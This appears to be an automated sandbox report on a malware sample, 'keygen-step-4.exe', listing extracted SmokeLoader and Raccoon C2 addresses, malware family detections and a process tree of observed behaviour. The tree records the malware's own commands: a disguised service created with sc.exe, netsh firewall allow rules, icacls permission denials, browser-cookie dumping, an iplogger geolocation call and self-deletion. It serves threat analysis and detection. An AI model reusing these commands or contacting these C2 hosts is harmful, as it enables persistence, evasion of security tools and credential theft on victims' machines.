Analysis
-
max time kernel
120s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 11:08
General
-
Target
keygen-step-4.exe
-
Size
6.8MB
-
MD5
38f1d6ddf7e39767157acbb107e03250
-
SHA1
dcb0d5feacb80c1e4cbb71a30cff7edf10a185e8
-
SHA256
97ada84ef77a3b45abd2e14caf519e06bbbad5a6ed180aa6ee543e38e9bce796
-
SHA512
3ba909b5001a3b995ebe8f9dbd4ddb6506a5c66612cf43e94a50f72c543a9aa4828bbba224db807de10076c5e70fabf7cc31bf8e442a3f4cf26d95c7f7094c2d
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
17694a35d42ac97e2cd3ebd196db01b372cce1b0
Attributes
-
url4cnc
https://telete.in/o23felk0s
rc4.plain
rc4.plain
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
027bc1bb9168079d5f7473eee9c05ee06589c305
Attributes
-
url4cnc
https://telete.in/jjbadb0y
rc4.plain
rc4.plain
Extracted
Family
metasploit
Version
windows/single_exec
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Nirsoft 6 IoCs
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 35 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 23 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Program Files directory 48 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Control Panel 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 8 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 17 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1613214365684.exe"C:\Users\Admin\AppData\Roaming\1613214365684.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214365684.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1613214370371.exe"C:\Users\Admin\AppData\Roaming\1613214370371.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214370371.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1613214376012.exe"C:\Users\Admin\AppData\Roaming\1613214376012.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613214376012.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP4⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-KAEMP.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-KAEMP.tmp\23E04C4F32EF2158.tmp" /SL5="$401C6,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\HappyNewYear\seed.sfx.exe"C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s16⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"6⤵
- Checks computer location settings
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exeC:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp13⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 44843⤵
- Drops file in Windows directory
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7619093185E374647BEB59CDA470ACE7 C2⤵
- Loads dropped DLL
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\7DDB.exeC:\Users\Admin\AppData\Local\Temp\7DDB.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\844695e6-a285-415e-92f8-8b2102b66065" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\7DDB.exe"C:\Users\Admin\AppData\Local\Temp\7DDB.exe" --Admin IsNotAutoStart IsNotTask2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin1.exe"C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin1.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin2.exe"C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin2.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin.exe"C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\updatewin.exe4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\5.exe"C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\1db69882-c613-4de6-b5ab-1efe0411d3ee\5.exe & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5.exe /f5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7FF0.exeC:\Users\Admin\AppData\Local\Temp\7FF0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 7FF0.exe /f & erase C:\Users\Admin\AppData\Local\Temp\7FF0.exe & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 7FF0.exe /f3⤵
- Kills process with taskkill
-
-
-
C:\Users\Admin\AppData\Local\Temp\860B.exeC:\Users\Admin\AppData\Local\Temp\860B.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\860B.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\8DBD.exeC:\Users\Admin\AppData\Local\Temp\8DBD.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\959E.exeC:\Users\Admin\AppData\Local\Temp\959E.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nstbbymg\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sbvasrmi.exe" C:\Windows\SysWOW64\nstbbymg\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create nstbbymg binPath= "C:\Windows\SysWOW64\nstbbymg\sbvasrmi.exe /d\"C:\Users\Admin\AppData\Local\Temp\959E.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description nstbbymg "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start nstbbymg2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\9E2A.exeC:\Users\Admin\AppData\Local\Temp\9E2A.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\AB1C.exeC:\Users\Admin\AppData\Local\Temp\AB1C.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 24482⤵
- Program crash
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\nstbbymg\sbvasrmi.exeC:\Windows\SysWOW64\nstbbymg\sbvasrmi.exe /d"C:\Users\Admin\AppData\Local\Temp\959E.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\B51F.exeC:\Users\Admin\AppData\Local\Temp\B51F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B51F.exeC:\Users\Admin\AppData\Local\Temp\B51F.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\BFA0.exeC:\Users\Admin\AppData\Local\Temp\BFA0.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\D098.exeC:\Users\Admin\AppData\Local\Temp\D098.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\D098.exe"C:\Users\Admin\AppData\Local\Temp\D098.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /15-153⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\D462.exeC:\Users\Admin\AppData\Local\Temp\D462.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
2File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
6Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
176KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
184KB
-
Filesize
232KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
220KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
1.2MB
-
Filesize
1.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
592KB
-
Filesize
584KB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
4.7MB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
44KB
-
Filesize
92KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
3.2MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.2MB
-
Filesize
588KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
588KB
-
Filesize
4.7MB
-
Filesize
76KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
544KB
-
Filesize
560KB
-
Filesize
348KB
-
Filesize
504KB
-
Filesize
588KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
504KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
504KB
-
Filesize
588KB
-
Filesize
40KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
588KB
-
Filesize
40KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
540KB
-
Filesize
4KB
-
Filesize
544KB
-
Filesize
560KB
-
Filesize
4KB
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8.1MB
-
Filesize
8.0MB
-
Filesize
8.1MB
-
Filesize
4KB
-
Filesize
584KB
-
Filesize
592KB